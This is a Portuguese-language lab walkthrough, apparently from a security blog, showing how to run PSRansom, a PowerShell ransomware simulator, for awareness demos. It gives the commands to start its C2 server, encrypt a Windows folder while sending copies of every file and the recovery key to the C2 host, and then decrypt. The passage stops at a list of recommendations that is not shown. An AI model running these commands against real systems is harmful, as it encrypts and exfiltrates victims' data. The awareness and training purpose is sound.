PSRansom é um script escrito em PowerShell que permite simular o funcionamento de um Ransomware. É um script que você pode utilizar por exemplo em uma apresentação de conscientização sobre os riscos e o impacto que um ransomware pode causar.
🔴 O uso indevido desta técnica é de sua total responsabilidade e está sujeito as penalizações prevista na Lei 12.737.
Realize o clone do projeto PSRansom
Linuxgit clone https://github.com/JoelGMSec/PSRansom cd PSRansom ls -l

Inicie o C2 Server através do comando a seguir :
Linuxpwsh C2Server.ps1 + 80

No host Windows criei a pasta 100SECURITY com alguns arquivos como exemplo.

Realize o download do PSRansom no Windows e execute o comando a seguir:
.\PSRansom.ps1 -e C:\100SECURITY -s 192.168.0.76 -p 80 -x

No servidor C2 o atacante recebe a lista de arquivos que foram criptografados e a Chave de Recuperação.
LinuxChave de Recuperação : WNLmTxjnDpzZGaEF4AsUYgi5

Arquivos criptografados com a extensão .psr

Dentro da pasta C2Files o atacante recebe uma cópia de todos os arquivos antes da criptografia.
Linuxcd CS2Files ls -l

Observe que foi criado o arquivo readme.txt contendo a Chave de Recuperação dos arquivos.
WindowsRecovery Key : WNLmTxjnDpzZGaEF4AsUYgi5

Para recuperar os arquivos basta digitar o comando a seguir :
PoweShell.\PSRansom.ps1 -d C:\100SECURITY -K WNLmTxjnDpzZGaEF4AsUYgi5

Arquivos recuperados com sucesso!

Para exibir a mensagem basta utilizar o parâmetro -demo :
PoweShell.\PSRansom.ps1 -e C:\100SECURITY -s 192.168.0.76 -p 80 -x -demo

💀 Mensagem!

Se o usuário clicar em Pay Now! é exibido um pop-up na tela.

O impacto e o prejuízo financeiro que este tipo de ataque por causar nas empresa é muito grande, segue algumas recomendações :